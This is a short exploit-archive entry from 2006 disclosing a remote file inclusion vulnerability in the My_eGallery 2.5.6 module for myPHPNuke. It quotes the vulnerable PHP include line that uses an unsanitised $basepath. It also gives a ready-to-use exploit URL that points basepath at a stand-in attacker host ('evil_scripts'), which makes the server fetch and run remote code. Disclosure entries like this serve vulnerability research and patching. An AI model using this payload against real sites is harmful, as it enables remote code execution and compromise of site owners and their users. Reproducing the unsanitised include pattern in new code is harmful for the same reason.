myphpNuke Module My_eGallery 2.5.6 (basepath) RFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : myphpNuke Module My_eGallery 2.5.6 (basepath) RFI Vulnerability
# Published : 2006-12-25
# Author : xoron
# Previous Title : Shadowed Portal Module Character Roster (mod_root) RFI Vulnerability
# Next Title : Fishyshoop <= 0.930b Remote Add Administrator Account Exploit

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

myPHPNuke Gallery Module (basepath) Remote File Include

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Found: Cyber-Security.Org

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
c0DE:

include ("$basepath/imageFunctions.php");

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

3xplo!t:

/gallery/displayCategory.php?basepath=http://evil_scripts?

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Reference: http://cyber-security.org/DataDetayAll.asp?Data_id=586

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

script download:

http://myphpnuke.com/download.php?op=getit&lid=28

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# www.Syue.com [2006-12-25]